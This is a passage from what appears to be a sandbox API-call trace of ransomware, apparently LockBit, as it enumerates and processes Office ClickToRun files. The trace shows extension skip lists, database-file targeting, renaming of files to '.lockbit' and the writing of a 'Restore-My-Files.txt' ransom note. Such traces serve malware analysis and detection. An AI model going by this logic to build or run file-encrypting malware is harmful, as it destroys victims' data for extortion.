ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0076.642] lstrcmpiW (lpString1=".", lpString2="api-ms-win-crt-conio-l1-1-0.dll") returned -1 [0076.642] lstrcmpiW (lpString1="..", lpString2="api-ms-win-crt-conio-l1-1-0.dll") returned -1 [0076.642] PathFindExtensionW (pszPath="api-ms-win-crt-conio-l1-1-0.dll") returned=".dll" [0076.642] PathFindExtensionW (pszPath="api-ms-win-crt-convert-l1-1-0.dll") returned=".dll" [0076.642] PathFindExtensionW (pszPath="api-ms-win-crt-environment-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-filesystem-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-heap-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-locale-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-math-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-multibyte-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-private-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-process-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-runtime-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-stdio-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-string-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-time-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="api-ms-win-crt-utility-l1-1-0.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="ApiClient.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="AppVCatalog.dll") returned=".dll" [0076.643] PathFindExtensionW (pszPath="appvcleaner.exe") returned=".exe" [0076.648] PathFindExtensionW (pszPath="AppVFileSystemMetadata.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppVIntegration.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppVIsvApi.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppvIsvStream32.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppvIsvStream64.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppVIsvStreamingManager.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppVIsvSubsystemController.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppvIsvSubsystems32.dll") returned=".dll" [0076.648] PathFindExtensionW (pszPath="AppvIsvSubsystems64.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="AppVIsvVirtualization.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="AppVManifest.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="AppVOrchestration.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="AppVPolicy.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="AppVScripting.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="AppVShNotify.exe") returned=".exe" [0076.649] PathFindExtensionW (pszPath="C2R32.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="C2R64.dll") returned=".dll" [0076.649] PathFindExtensionW (pszPath="C2RHeartbeatConfig.xml") returned=".xml" [0076.649] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.649] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="C2RHeartbeatConfig.xml") returned 1 [0076.649] lstrcmpiW (lpString1="ntldr", lpString2="C2RHeartbeatConfig.xml") returned 1 [0076.649] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="C2RHeartbeatConfig.xml") returned 1 [0076.649] lstrcmpiW (lpString1="bootsect.bak", lpString2="C2RHeartbeatConfig.xml") returned -1 [0076.649] lstrcmpiW (lpString1="autorun.inf", lpString2="C2RHeartbeatConfig.xml") returned -1 [0076.649] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") returned="" [0076.649] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned=".xml" [0076.649] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0076.650] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0076.650] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0076.651] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2RHeartbeatConfig.xml.lockbit") returned 89 [0076.651] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0076.651] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2RHeartbeatConfig.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.lockbit")) returned 1 [0076.654] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2RHeartbeatConfig.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0076.654] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.654] malloc (_Size=0x40068) returned 0x206b860 [0076.654] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=4136) returned 1 [0076.654] ReadFile (in: hFile=0x3a0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0076.657] GetLastError () returned 0x3e5 [0076.657] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2RHeartbeatConfig.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun") returned 1 [0076.657] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt") returned 79 [0076.657] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a4 [0076.658] CreateIoCompletionPort (FileHandle=0x3a4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.658] malloc (_Size=0x40068) returned 0x20abae0 [0076.659] WriteFile (in: hFile=0x3a4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0076.661] GetLastError () returned 0x3e5 [0076.661] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x175dffd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x175dffd0, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x15487e00, ftLastWriteTime.dwHighDateTime=0x1d0d7b1, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="C2RUI.en-us.dll", cAlternateFileName="C2RUIE~1.DLL")) returned 1 [0076.661] lstrcmpiW (lpString1=".", lpString2="C2RUI.en-us.dll") returned -1 [0076.661] lstrcmpiW (lpString1="..", lpString2="C2RUI.en-us.dll") returned -1 [0076.661] PathFindExtensionW (pszPath="C2RUI.en-us.dll") returned=".dll" [0076.661] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.661] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.661] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.661] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.661] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.661] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.661] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.662] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.662] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.662] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.662] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.662] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.663] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d9c750, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17d9c750, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0076.663] lstrcmpiW (lpString1=".", lpString2="concrt140.dll") returned -1 [0076.663] lstrcmpiW (lpString1="..", lpString2="concrt140.dll") returned -1 [0076.663] PathFindExtensionW (pszPath="concrt140.dll") returned=".dll" [0076.663] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.663] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.663] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.664] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.664] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.664] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.664] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.664] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.665] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.665] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.665] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d9c750, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17d9c750, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x1f3ca200, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="i640.hash", cAlternateFileName="I640~1.HAS")) returned 1 [0076.665] lstrcmpiW (lpString1=".", lpString2="i640.hash") returned -1 [0076.665] lstrcmpiW (lpString1="..", lpString2="i640.hash") returned -1 [0076.665] PathFindExtensionW (pszPath="i640.hash") returned=".hash" [0076.665] lstrcmpiW (lpString1=".386", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".cmd", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".exe", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".ani", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".adv", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".theme", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".msi", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".msp", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".com", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".diagpkg", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".nls", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".diagcab", lpString2=".hash") returned -1 [0076.665] lstrcmpiW (lpString1=".lock", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".ocx", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".mpa", lpString2=".hash") returned 1 [0076.665] lstrcmpiW (lpString1=".cpl", lpString2=".hash") returned -1 [0076.666] lstrcmpiW (lpString1=".mod", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".hta", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".icns", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".prf", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".rtp", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".diagcfg", lpString2=".hash") returned -1 [0076.666] lstrcmpiW (lpString1=".msstyles", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".bin", lpString2=".hash") returned -1 [0076.666] lstrcmpiW (lpString1=".hlp", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".shs", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".drv", lpString2=".hash") returned -1 [0076.666] lstrcmpiW (lpString1=".wpx", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".bat", lpString2=".hash") returned -1 [0076.666] lstrcmpiW (lpString1=".rom", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".msc", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".spl", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".ps1", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".msu", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".ics", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".key", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".mp3", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".reg", lpString2=".hash") returned 1 [0076.666] lstrcmpiW (lpString1=".dll", lpString2=".hash") returned -1 [0076.667] lstrcmpiW (lpString1=".ini", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".idx", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".sys", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".hlp", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".ico", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".lnk", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".rdp", lpString2=".hash") returned 1 [0076.667] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.667] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="i640.hash") returned 1 [0076.667] lstrcmpiW (lpString1="ntldr", lpString2="i640.hash") returned 1 [0076.667] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="i640.hash") returned 1 [0076.667] lstrcmpiW (lpString1="bootsect.bak", lpString2="i640.hash") returned -1 [0076.667] lstrcmpiW (lpString1="autorun.inf", lpString2="i640.hash") returned -1 [0076.667] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") returned="" [0076.667] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i640.hash") returned=".hash" [0076.667] lstrcmpiW (lpString1=".rar", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".zip", lpString2=".hash") returned 1 [0076.667] lstrcmpiW (lpString1=".7z", lpString2=".hash") returned -1 [0076.667] lstrcmpiW (lpString1=".ckp", lpString2=".hash") returned -1 [0076.667] lstrcmpiW (lpString1=".dacpac", lpString2=".hash") returned -1 [0076.667] lstrcmpiW (lpString1=".db", lpString2=".hash") returned -1 [0076.667] lstrcmpiW (lpString1=".db-shm", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".db-wal", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".db3", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".dbf", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".dbc", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".dbs", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".dbt", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".dbv", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".frm", lpString2=".hash") returned -1 [0076.668] lstrcmpiW (lpString1=".mdf", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".mrg", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".mwb", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".myd", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".ndf", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".qry", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".sdb", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".sdf", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".sql", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".sqlite", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".sqlite3", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".sqlitedb", lpString2=".hash") returned 1 [0076.668] lstrcmpiW (lpString1=".tmd", lpString2=".hash") returned 1 [0076.668] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i640.hash.lockbit") returned 76 [0076.668] lstrcmpiW (lpString1=".hash", lpString2=".lockbit") returned -1 [0076.669] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i640.hash.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.lockbit")) returned 1 [0076.670] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i640.hash.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a8 [0076.670] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.670] malloc (_Size=0x40068) returned 0x20ebb50 [0076.672] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x20ebb68 | out: lpFileSize=0x20ebb68*=102) returned 1 [0076.672] ReadFile (in: hFile=0x3a8, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 0x0 [0076.673] GetLastError () returned 0x3e5 [0076.673] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i640.hash" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun") returned 1 [0076.673] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt") returned 79 [0076.673] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.674] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17606130, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17606130, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x1e0b7500, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="i641033.hash", cAlternateFileName="I64103~1.HAS")) returned 1 [0076.674] lstrcmpiW (lpString1=".", lpString2="i641033.hash") returned -1 [0076.674] lstrcmpiW (lpString1="..", lpString2="i641033.hash") returned -1 [0076.674] PathFindExtensionW (pszPath="i641033.hash") returned=".hash" [0076.674] lstrcmpiW (lpString1=".386", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".cmd", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".exe", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".ani", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".adv", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".theme", lpString2=".hash") returned 1 [0076.674] lstrcmpiW (lpString1=".msi", lpString2=".hash") returned 1 [0076.674] lstrcmpiW (lpString1=".msp", lpString2=".hash") returned 1 [0076.674] lstrcmpiW (lpString1=".com", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".diagpkg", lpString2=".hash") returned -1 [0076.674] 